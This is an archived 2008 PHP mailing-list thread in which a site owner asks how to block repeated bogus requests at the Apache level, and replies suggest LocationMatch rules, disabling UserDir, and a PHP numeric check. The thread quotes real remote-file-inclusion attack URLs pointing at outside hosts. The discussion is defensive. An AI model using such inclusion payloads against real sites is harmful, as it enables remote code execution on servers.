Prev: Questions about finding ranges
Next: a question...
From: "Arno Kuhl" on 23 Jul 2008 11:02
I'm getting a lot of bogus requsts in the form of
"index.php?id=http://64.15.67.17/~babysona/logo.jpg?", sometimes more than a
hundred a day per domain. The php script catches it, logs the request, sends
an email report and replies with "access denied", but it takes processing
which I'd rather not have php busy with. (The php script rejects anything
where id=something_not_numeric.) Is there a way for apache to catch these
requests before passing it to php? Is it more efficient for apache to handle
this than php?

Arno

From: Per Jessen on 23 Jul 2008 12:31
Arno Kuhl wrote:

> Is there a
> way for apache to catch these requests before passing it to php? Is i=
t
> more efficient for apache to handle this than php?

2 x yes. I think you could probably use <LocationMatch> and ban all
access with "Deny from all".=20


/Per Jessen, Z=C3=BCrich

From: Jim Lucas on 23 Jul 2008 17:06
Arno Kuhl wrote:
> I'm getting a lot of bogus requsts in the form of
> "index.php?id=http://64.15.67.17/~babysona/logo.jpg?", sometimes more than a
> hundred a day per domain. The php script catches it, logs the request, sends
> an email report and replies with "access denied", but it takes processing
> which I'd rather not have php busy with. (The php script rejects anything
> where id=something_not_numeric.) Is there a way for apache to catch these
> requests before passing it to php? Is it more efficient for apache to handle
> this than php?
>
> Arno
>
>

Yes, in Apache turn off userdir access

In your httpd.conf file do this.

UserDir disabled

That way it will not process url that starts with a tildy ~...

That should take care of it. Apache should then only report a 404 error to
the error log for the given virtual host.

--
Jim Lucas

"Some men are born to greatness, some achieve greatness,
and some have greatness thrust upon them."

Twelfth Night, Act II, Scene V
by William Shakespeare

From: "Arno Kuhl" on 24 Jul 2008 03:04
> I'm getting a lot of bogus requsts in the form of
> "index.php?id=http://64.15.67.17/~babysona/logo.jpg?", sometimes more
> than a hundred a day per domain. The php script catches it, logs the
> request, sends an email report and replies with "access denied", but
> it takes processing which I'd rather not have php busy with. (The php
> script rejects anything where id=something_not_numeric.) Is there a
> way for apache to catch these requests before passing it to php? Is it
> more efficient for apache to handle this than php?
>
> Arno
>

Yes, in Apache turn off userdir access
In your httpd.conf file do this.
UserDir disabled
That way it will not process url that starts with a tildy ~...
That should take care of it. Apache should then only report a 404 error to
the error log for the given virtual host.

--
Thanks for the reply. Is that correct htough? I always thought in the
example
http://mysite.com/index.php?id=http://64.15.67.17/~babysona/logo.jpg?
the url started with index.php...

Most the requests though look more like
http://mysite.com/index.php?id=http://calebsbirth.pisem.su/caleb.htm?
without the tilde.

I was hoping there's a way to tell apache to block requests where
id=non_numeric.

Cheers
Arno

From: Chris on 24 Jul 2008 03:14

> I was hoping there's a way to tell apache to block requests where
> id=non_numeric.

It's trying to do a remote inclusion.

It's easy for you to fix in php:

if (isset($_GET['id'])) {
if (!is_numeric($_GET['id'])) {
die("Die hacker die!");
}
}

I'm sure there would be a way to do it with ModRewrite or something but
it's 5 lines of code in php so I'd do it there *shrug*.

--
Postgresql & php tutorials
http://www.designmagick.com/
 |  Next  |  Last
Pages: 1 2 3
Prev: Questions about finding ranges
Next: a question...